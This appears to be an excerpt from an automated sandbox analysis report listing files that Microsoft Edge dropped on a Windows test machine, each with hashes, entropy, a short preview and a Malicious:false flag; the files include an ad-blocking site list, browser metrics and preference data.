                                                                                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D47-1CBC.pma

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03996465525118641
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:vSy01utmqvDDYMhJvyqlBqfr3nXgXX3OD5DhKfINEydMGRQ83SDOn8y08Tcm2RGY:j0EttSQoh/TNzSDO08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:1D36DE2A91E747609E7CAEB382EF6484
                                                                                                                                                                                                                                                                                  SHA1:38BFEFE4C528FD0A4F732D1CA9F9544F4DC3D925
                                                                                                                                                                                                                                                                                  SHA-256:DDE90DEADEEAF92FD0DB4731C66DE30C7822CB3B5F0497A47C5F4CBDDC53B868
                                                                                                                                                                                                                                                                                  SHA-512:E7ADE78C3BE2813A56F249EEB54DE220DF3537FC6C5813CD2AEF0D368308BBE57617DE9C17324179254B7A2448576D372952001805536818E3682046A2D26F25
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................a..HQ..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....i.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ssxapm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..Uu.$r.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D48-1DCC.pma

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4380456473510811
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:ThY/seug5z5KlaH4W1dfoZY8UNLS7tmaHq:w3p5KE1gLtd
                                                                                                                                                                                                                                                                                  MD5:F5E34F5487AD738F7A99F05AA94B46D2
                                                                                                                                                                                                                                                                                  SHA1:D0F737AD506F7AF3B0950D9FD202BB85FECEDB67
                                                                                                                                                                                                                                                                                  SHA-256:491898951A70575989657BE383F382B5D161EED20E4BE808654EEA4CBB6D1E15
                                                                                                                                                                                                                                                                                  SHA-512:B4AA837461EF5E8F236DBF314D6283F911937D9CE9ECC9BDD62A623F0589E938907BC644149FA6DD23E4D10B3D271BC16DE367125B4A784B64FA85504C1536EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............@...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....m.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ssxapm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K.u.$r.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D56-1464.pma

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.039015243486150736
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:/S+0EbZmqvDEKXWJEaIX1gzNg7X0CQ0Ug8vYhdQNngu1gQMxv2I9n8y08Tcm2RGY:f0EZkeHqiUshSe6gFvj08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:4CD5083888331163E4264E7486B0DA43
                                                                                                                                                                                                                                                                                  SHA1:966E45F8B07E90FC3228D07707148F7328209C34
                                                                                                                                                                                                                                                                                  SHA-256:6FD555C7F08EE82C6E806A2BDE0F013EFC3898BB39328B8E56F38C0C1158A565
                                                                                                                                                                                                                                                                                  SHA-512:1C20403097EE60347C8611BC63D205E47BC99850D57BA8BB66BF2C750BC7D48880CEEFAD9937F5E6F18BB59D7F1ED9FC4A4B1B6E42366193AADCA53E5727206D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................^...N..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....i.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ssxapm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..Uu.$r.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D5C-1D88.pma

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03992101248243327
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:em0EbZmqvD3KX79JEa3Xxx7uqZGXPtg34khtbNEk8AMj1gQpeVUD65mTn8y08Tcp:D0EZUe18xphlXuZgwGUD+k08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:2BAA14695EE44D3C8E093174D3C5AE54
                                                                                                                                                                                                                                                                                  SHA1:817D0598DA674EBCF4D2C5A47C1435C2DCB9971F
                                                                                                                                                                                                                                                                                  SHA-256:9DAB0DE7D66328FB61E97F9EB8B9F1A3597FD92D310757416118C674F6BA1A1E
                                                                                                                                                                                                                                                                                  SHA-512:758F6EA4BCD45599680C454C960272C19FB69443C34AFFDE52475F07412978D025E4F3612B9F14A50E70C69F651FEAB43CD01B1C96EF2E4AF3B29FDE2DC99930
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................`...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....}.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ssxapm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...............................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D64-2018.pma

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.039866332631596356
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:JF0EbZmqvD3KX70JEa3Xxx7uqZGXPtg34N+hHBNE6nrm1gQMzXAjn8y08Tcm2RGY:j0EZ1e18xFhhxGgXXC08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:05587853A0E289263433CC22B500A404
                                                                                                                                                                                                                                                                                  SHA1:BAB62AB008D9EDD154E45B5D200F239DB161F6F5
                                                                                                                                                                                                                                                                                  SHA-256:B2230B45D9F3A28C9700B16158AA06414A48C5DC1D8379732FF8B3A016B83149
                                                                                                                                                                                                                                                                                  SHA-512:BC29687A281BFC4BF34A53B66F44880AB28FE6D4C5B7BB4E00F4EFC477BB13CC49C86C0A762F44C207ECE58A2586CAA342A3F34007EFEF3437FB11D6AC3E9CC4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................`...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ssxapm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3553968406659012
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                                                                                                                  MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                                                                                                                  SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                                                                                                                  SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                                                                                                                  SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.051141892342046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj12tll:o1//BVsJDG2YqCX
                                                                                                                                                                                                                                                                                  MD5:0E7D6A6182C1D335B1771C6875526753
                                                                                                                                                                                                                                                                                  SHA1:FC33DB69F45C332345E79DE7648A9E8D8C026507
                                                                                                                                                                                                                                                                                  SHA-256:F5F0335CD18CDFF2B6DEAA942B958D7F5A2948CADE4D1FAAFDC3C7264F652E29
                                                                                                                                                                                                                                                                                  SHA-512:A88DE7AF4DA2575F1A6FEC2E553E0498DB3ED9AEC0AFBE9DC7BF2853F799E9B83FC17837BB6BAFA21528D4CB654F61EFD53A232AC3C11EC71F241809B800EB5F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3aa82c59-3ae4-4eb9-80d5-5ca21a565931.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13769
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.225058029253095
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sVeJ9pQTryZioouba4uyoJzG6ID+CXY/3M8tpj+FVAtOVJj1f:sVeLAoxuJJzGt+rpUVyOVj
                                                                                                                                                                                                                                                                                  MD5:CACB6EE2888AFE0DFC456C1C68F4B41B
                                                                                                                                                                                                                                                                                  SHA1:C54DB113758E0853EE7330540A52C5B875601DAB
                                                                                                                                                                                                                                                                                  SHA-256:5D0B73E52FDEAE8D4CABE151A77776C3DFEFC617CCD14CB612C7C053471167CD
                                                                                                                                                                                                                                                                                  SHA-512:310BB545D1F82BFF06211BEED2C75F2F8C491C68FE537A9ED4814C8FED9173502306CC619F9F260033D33DD0A36D539517A2C860F1D6D1D5D81EAE86F78B9D69
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13378326089350309","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4d13ef7d-3daf-4d15-a594-df87a006d7ba.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.567282184725223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:m7dZSEWPCkfeR8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkBf1Lrw/ypAtuY:m7dZSEWPCkfeRu1jad51ABtj
                                                                                                                                                                                                                                                                                  MD5:B8270858B92A4BA2284596202EAF73C7
                                                                                                                                                                                                                                                                                  SHA1:88AB3FE54B5FC7F7529C8A8102E0D108D2B3F93A
                                                                                                                                                                                                                                                                                  SHA-256:EB98C0DFBDCC65C234672D2C9B131313159A937C5241F3FBFC6B0C01714A1EB2
                                                                                                                                                                                                                                                                                  SHA-512:86530EC8FFF03D989072D54DD87A6272858A721DEC429239248A012DF91BC67DE7AB9A9FCACA43EFFC8E2C487DA114E81BB60E069A392C815CFB994FB3FDF59C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326088612821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326088612821","location":5,"ma

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\53e1958c-f6ab-4230-a673-514b4be657c2.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\65392729-4ae6-4800-a1e7-f6518a2af812.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                  Malicious:false
